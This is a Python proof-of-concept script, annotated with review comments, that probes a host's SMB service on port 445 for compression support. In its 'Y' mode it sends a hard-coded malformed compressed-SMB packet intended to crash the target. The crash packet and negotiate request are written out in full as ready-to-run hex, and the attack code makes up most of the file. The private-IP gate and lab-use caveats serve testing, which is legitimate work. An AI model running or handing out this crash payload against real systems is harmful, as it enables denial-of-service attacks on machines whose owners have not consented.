poc-and-scan.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Flat script, no functions. What it does, in order:
#   1. argument / usage check (IP plus a "Y"/"N" switch),
#   2. refuses any target whose first two octets are not in a private
#      (RFC 1918) or loopback range,
#   3. opens TCP/445, sends one fixed, hard-coded SMB2 negotiate request and
#      reads a single response,
#   4. prints which compression algorithm the response advertises, judged
#      purely by the last 9 bytes of that response,
#   5. with "Y" only: sends a second fixed, deliberately malformed packet
#      (the author's "Scan+Crash" mode), then closes the socket.
# The "N" path is the only non-disruptive one; "Y" is intended to crash the
# target, so keep it to lab hosts you own.  Nothing here retries, times out,
# or validates response length, see the inline caveats.
import sys, socket, struct
if len(sys.argv) != 3 or sys.argv[2] not in ["Y", "N"]:
    print("Scan only: %s IP N" % (sys.argv[0]))
    print("Scan+Crash: %s IP Y" % (sys.argv[0]))
    # NOTE(review): exit() is the site-module helper and is absent under
    # `python -S`; sys.exit() is the robust spelling (same for the exit below).
    exit()
# Only the first two dotted octets are parsed; an argument with fewer than
# two dotted parts raises IndexError on the check below, a non-numeric part
# raises ValueError here.  IPv6 and hostnames are not handled at all.
my_IP: list[int] = list(map(int, sys.argv[1].strip().split('.')[:2]))
# Target gate: 10/8, 127/8, 172.16/12 and 192.168/16 pass, everything else
# is refused.  range(16, 31) is exclusive at the top, so 172.31.x.x (still
# part of 172.16.0.0/12) is rejected here; harmless, but stricter than RFC 1918.
if my_IP[0] == 10 or my_IP[0] == 127: pass
elif my_IP[0] == 172 and my_IP[1] in range(16, 31): pass
elif my_IP[0] == 192 and my_IP[1] == 168: pass
else:
    print("Never use on public IPs!")
    exit()
# Hard-coded SMB2 negotiate request, hex encoded.  Byte layout as visible in
# the constant: a 4-byte NetBIOS session header (0x000000b2 = 178 = the 182
# bytes that follow minus the header itself), then the SMB2 protocol id
# 0xFE 'S' 'M' 'B'.  The remaining fields are not parsed or built by this
# script; they are sent verbatim, so any change here changes the request.
SMB_negotiation: str = "000000b2fe534d424000010000000000" + \
    "00002100100000000000000000000000" + \
    "00000000fffe00000000000000000000" + \
    "00000000000000000000000000000000" + \
    "0000000024000500010000007f000000" + \
    "aa9952d87063ea118a76005056b886b0" + \
    "70000000020000000202100200030203" + \
    "11030000010026000000000001002000" + \
    "01006c6110bcde71a04e50810ffac076" + \
    "9c32c4c011cf86e26deb2ba923cd79cb" + \
    "bf7c000003000a000000000001000000" + \
    "000000000100"
# socket.socket(2, 1): the numeric values of AF_INET and SOCK_STREAM on the
# common platforms; socket.AF_INET / socket.SOCK_STREAM would be the readable
# form.  No timeout is set, so connect() and recv() can block indefinitely.
s = socket.socket(2,1)
s.connect((sys.argv[1],445))
s.send(bytes.fromhex(SMB_negotiation))
# One recv() is assumed to return the whole negotiate response.  A short read,
# an empty reply or an RST leaves rcv_buf shorter than 74 bytes, and the
# unpack below then raises struct.error; a `len(rcv_buf) >= 74` check before
# unpacking is the guard a scanner should have.
rcv_buf: bytes = s.recv(4096)
# Little-endian u16 at bytes 72..73 of the response, printed as the SMB
# version below.  Presumably the dialect-revision field of the negotiate
# response at this fixed offset; the offset is never validated against the
# actual response layout, so a differently sized reply mis-parses silently.
smb_vers: int = struct.unpack("<H", rcv_buf[72:74])[0]
# Classification looks only at the trailing 9 bytes of the reply: seven zero
# bytes followed by a little-endian u16 of 1, 2 or 3.  Anything else, including
# a reply that simply ends differently, is reported as "no compression", so a
# negative result here is not proof that compression is disabled.
if rcv_buf.endswith(b"\x00"*7 + b"\x01\x00"):
    print("SMB v" + hex(smb_vers)[2:] + " with LZNT1 detected.")
elif rcv_buf.endswith(b"\x00"*7 + b"\x02\x00"):
    print("SMB v" + hex(smb_vers)[2:] + " with LZ77 detected.")
elif rcv_buf.endswith(b"\x00"*7 + b"\x03\x00"):
    print("SMB v" + hex(smb_vers)[2:] + " with LZ77+Huffman detected.")
else: print("SMB v" + hex(smb_vers)[2:] + " with no compression.")
# Second hard-coded packet, hex encoded: 4-byte NetBIOS header (0x42 = 66
# bytes of payload), the 0xFC 'S' 'M' 'B' protocol id used by compressed SMB2
# messages, 0xffffffff, then a run of 0x41 filler.  It is sent as-is whenever
# the second argument is "Y", regardless of which branch above printed, i.e.
# the scan result does not gate the crash attempt.
SMB_crash: str = "00000042fc534d423200000001000000" + \
    "ffffffff414141414141414141414141" + \
    "41414141414141414141414141414141" + \
    "41414141414141414141414141414141" + \
    "414141414141"
if sys.argv[2] == "Y":
    print("Sending malformed packet per user request!")
    s.send(bytes.fromhex(SMB_crash))
# Closed only on the happy path: any exception raised above (connect refused,
# struct.error on a short reply) skips this line and leaves the socket to the
# garbage collector.  `with socket.socket(...) as s:` would close it on every
# path.
s.close()